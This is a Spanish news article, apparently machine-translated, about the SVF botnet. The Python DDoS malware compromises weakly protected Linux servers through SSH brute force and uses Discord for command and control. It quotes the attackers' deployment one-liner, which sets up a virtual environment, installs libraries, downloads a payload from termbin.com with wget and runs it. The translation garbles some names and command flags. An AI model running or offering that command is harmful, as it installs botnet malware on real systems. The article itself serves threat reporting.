Los investigadores de ciberseguridad han descubierto una sofisticada campaña de ataque dirigida a los servidores de Linux mal administrado a través de ataques de fuerza bruta SSH para implementar la botnet SVF, un malware distribuido de servicio distribuido basado en Python.
El malware aprovecha la discordia como su infraestructura de comando y control y emplea múltiples servidores proxy para amplificar sus capacidades de ataque contra los sistemas específicos.
La botnet SVF representa una evolución notable en las herramientas de ataque DDoS, que combina técnicas tradicionales de fuerza bruta con plataformas de comunicación modernas.
Los actores de amenaza explotan a los servidores de Linux con credenciales SSH débiles, transformando sistemas comprometidos en poderosas armas DDOS capaces de lanzar tanto las inundaciones HTTP de la capa 7 como las inundaciones de UDP de la capa 4 contra las víctimas.
Analistas de ASEC identificado Este malware a través de sus sistemas de monitoreo de honeypot, que detectó numerosos intentos de comprometer los servicios de SSH utilizando ataques de diccionario y fuerza bruta.
SVF Bot (fuente -Asec)
Los investigadores observaron que SVF Bot fue creado por el “equipo de SVF” supuestamente para fines de entretenimiento después de que su botet de masilla anterior dejó de funcionar.
La campaña de ataque demuestra la amenaza persistente que enfrenta la infraestructura de Linux inadecuada, particularmente los sistemas expuestos a Internet con mecanismos de autenticación predeterminados o débiles.
Mecanismo de infección y despliegue
El proceso de instalación de SVF Botnet muestra la automatización sofisticada a través de una ejecución de comandos único. Tras un compromiso exitoso de SSH, los atacantes despliegan el malware usando: Python -M Venv Venv; fuente ./venv/bin/activate; PIP install Discord Discord.py Solicitudes AIOHTTP LXML; wget https://termbin.com/4ccx -o main.py; python main.py -s 5
Este comando establece un entorno virtual de Python, instala las dependencias requeridas, incluidas las bibliotecas de discordia, descarga la carga útil de malware y la ejecuta con el identificador del grupo de servidores “5”.
El malware se autentica con servidores de discordia utilizando tokens BOT integrados e informa inmediatamente infecciones exitosas a través de Webhooks, lo que permite la gestión y la coordinación de botnet en tiempo real para las campañas posteriores de DDOS.
Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.
